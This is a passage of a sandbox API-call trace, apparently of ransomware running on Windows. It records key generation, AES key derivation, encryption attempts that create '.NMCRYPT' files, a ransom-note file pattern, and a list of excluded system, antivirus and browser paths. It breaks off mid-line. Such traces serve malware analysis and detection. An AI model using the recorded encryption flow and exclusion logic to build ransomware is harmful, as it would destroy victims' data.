[0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.025] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x607570*, pdwDataLen=0x2d7f9cc*=0xf4, dwBufLen=0xaa0 | out: pbData=0x607570*, pdwDataLen=0x2d7f9cc*=0x100) returned 1 [0143.026] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x607670*, pdwDataLen=0x2d7f9cc*=0x1c, dwBufLen=0x9a0 | out: pbData=0x607670*, pdwDataLen=0x2d7f9cc*=0x100) returned 1 [0143.026] wcslen (_String=" ") returned 0x2 [0143.026] wcslen (_String="\\") returned 0x1 [0143.026] wcslen (_String="hiberfil.sys") returned 0xc [0143.026] wcslen (_String=" ") returned 0x2 [0143.027] wcslen (_String=" bytes...") returned 0xa [0143.027] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.027] CryptAcquireContextW (in: phProv=0x2883a60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2883a60*=0x8becf8) returned 1 [0143.027] CryptCreateHash (in: hProv=0x8becf8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x2883a64 | out: phHash=0x2883a64) returned 1 [0143.224] CryptHashData (hHash=0x8c6ce8, pbData=0x2d7fa50, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.224] CryptDeriveKey (in: hProv=0x8becf8, Algid=0x6610, hBaseData=0x8c6ce8, dwFlags=0x4, phKey=0x2883a68 | out: phKey=0x2883a68*=0x8be638) returned 1 [0143.224] CryptSetKeyParam (hKey=0x8be638, dwParam=0x1, pbData=0x2d7fb50, dwFlags=0x0) returned 1 [0143.224] CryptSetKeyParam (hKey=0x8be638, dwParam=0x4, pbData=0x2d7fa00*=0x1, dwFlags=0x0) returned 1 [0143.224] wcslen (_String="\\\\?\\") returned 0x4 [0143.224] wcslen (_String="\\\\?\\") returned 0x4 [0143.225] CryptDuplicateKey (in: hKey=0x8be638, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7f9d4 | out: phKey=0x2d7f9d4*=0x8be838) returned 1 [0143.225] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys.NMCRYPT" (normalized: "c:\\hiberfil.sys.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x26c [0143.229] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.229] CloseHandle (hObject=0x26c) returned 1 [0143.229] GetFileAttributesW (lpFileName="\\\\?\\C:\\hiberfil.sys.NMCRYPT" (normalized: "c:\\hiberfil.sys.nmcrypt")) returned 0x20 [0143.229] SetFileAttributesW (lpFileName="\\\\?\\C:\\hiberfil.sys.NMCRYPT", dwFileAttributes=0x20) returned 1 [0143.230] PathFileExistsW (pszPath="\\\\?\\C:\\hiberfil.sys.NMCRYPT") returned 1 [0143.230] DeleteFileW (lpFileName="\\\\?\\C:\\hiberfil.sys.NMCRYPT" (normalized: "c:\\hiberfil.sys.nmcrypt")) returned 1 [0143.230] CryptDestroyKey (hKey=0x8be838) returned 1 [0143.230] GetLastError () returned 0x20 [0143.230] wcslen (_String="Failed -> Cod 0x") returned 0x10 [0143.230] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.230] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.230] CryptDestroyKey (hKey=0x8be638) returned 1 [0143.230] CryptDestroyHash (hHash=0x8c6ce8) returned 1 [0143.231] CryptReleaseContext (hProv=0x8becf8, dwFlags=0x0) returned 1 [0143.231] FindNextFileW (in: hFindFile=0x8c6b28, lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 1 [0143.231] PathMatchSpecW (pszFile="pagefile.sys", pszSpec="*NMCRYPT") returned 0 [0143.231] PathMatchSpecW (pszFile="pagefile.sys", pszSpec="*Recovers your files.html") returned 0 [0143.231] PathMatchSpecW (pszFile="pagefile.sys", pszSpec="*.exe") returned 0 [0143.231] PathMatchSpecW (pszFile="pagefile.sys", pszSpec="*.dll") returned 0 [0143.231] PathMatchSpecW (pszFile="pagefile.sys", pszSpec="*.lnk") returned 0 [0143.231] PathMatchSpecW (pszFile="pagefile.sys", pszSpec="*.bat") returned 0 [0143.231] PathMatchSpecW (pszFile="pagefile.sys", pszSpec="*.ini") returned 0 [0143.231] PathMatchSpecW (pszFile="pagefile.sys", pszSpec="*.msi") returned 0 [0143.231] PathMatchSpecW (pszFile="pagefile.sys", pszSpec="*.scf") returned 0 [0143.231] PathMatchSpecW (pszFile="pagefile.sys", pszSpec="*pagefile.sys*") returned 1 [0143.231] FindNextFileW (in: hFindFile=0x8c6b28, lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 1 [0143.231] wcscmp (_String1="PerfLogs", _String2=".") returned 1 [0143.231] wcscmp (_String1="PerfLogs", _String2="..") returned 1 [0143.231] wcslen (_String="\\") returned 0x1 [0143.231] wcslen (_String="PerfLogs") returned 0x8 [0143.231] FindNextFileW (in: hFindFile=0x8c6b28, lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 1 [0143.231] wcscmp (_String1="Program Files", _String2=".") returned 1 [0143.231] wcscmp (_String1="Program Files", _String2="..") returned 1 [0143.231] wcslen (_String="\\") returned 0x1 [0143.231] wcslen (_String="Program Files") returned 0xd [0143.231] FindNextFileW (in: hFindFile=0x8c6b28, lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 1 [0143.231] wcscmp (_String1="Program Files (x86)", _String2=".") returned 1 [0143.231] wcscmp (_String1="Program Files (x86)", _String2="..") returned 1 [0143.231] wcslen (_String="\\") returned 0x1 [0143.231] wcslen (_String="Program Files (x86)") returned 0x13 [0143.232] FindNextFileW (in: hFindFile=0x8c6b28, lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 1 [0143.232] wcscmp (_String1="ProgramData", _String2=".") returned 1 [0143.232] wcscmp (_String1="ProgramData", _String2="..") returned 1 [0143.232] wcslen (_String="\\") returned 0x1 [0143.232] wcslen (_String="ProgramData") returned 0xb [0143.232] FindNextFileW (in: hFindFile=0x8c6b28, lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 1 [0143.232] wcscmp (_String1="Recovery", _String2=".") returned 1 [0143.232] wcscmp (_String1="Recovery", _String2="..") returned 1 [0143.232] wcslen (_String="\\") returned 0x1 [0143.232] wcslen (_String="Recovery") returned 0x8 [0143.232] FindNextFileW (in: hFindFile=0x8c6b28, lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 1 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*NMCRYPT") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*Recovers your files.html") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*.exe") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*.dll") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*.lnk") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*.bat") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*.ini") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*.msi") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*.scf") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*pagefile.sys*") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*NTUSER.DAT*") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*AppData*") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*\\winrar\\*") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*\\java\\*") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*\\TeamViewer\\*") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*\\windows\\*") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*\\ESET\\*") returned 0 [0143.232] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*\\AVG\\*") returned 0 [0143.233] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*\\AVIRA\\*") returned 0 [0143.233] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*\\AVAST Software\\*") returned 0 [0143.233] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*Atheros*") returned 0 [0143.233] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*Realtek*") returned 0 [0143.233] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*bootmgr*") returned 0 [0143.233] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*boot*") returned 0 [0143.233] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*boot*") returned 0 [0143.233] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*CONFIG.SYS*") returned 0 [0143.233] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*IO.SYS*") returned 0 [0143.233] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*MSDOS.SYS*") returned 0 [0143.233] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*NTDETECT.COM*") returned 0 [0143.233] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*ntldr*") returned 0 [0143.233] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*chrome*") returned 0 [0143.233] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*opera*") returned 0 [0143.233] PathMatchSpecW (pszFile="swapfile.sys", pszSpec="*firefox*") returned 0 [0143.233] wcslen (_String="\\") returned 0x1 [0143.233] wcslen (_String="swapfile.sys") returned 0xc [0143.233] PathMatchSpecW (pszFile="C:\\swapfile.sys", pszSpec="*") returned 1 [0143.233] strlen (_Str="NMoreira") returned 0x8 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 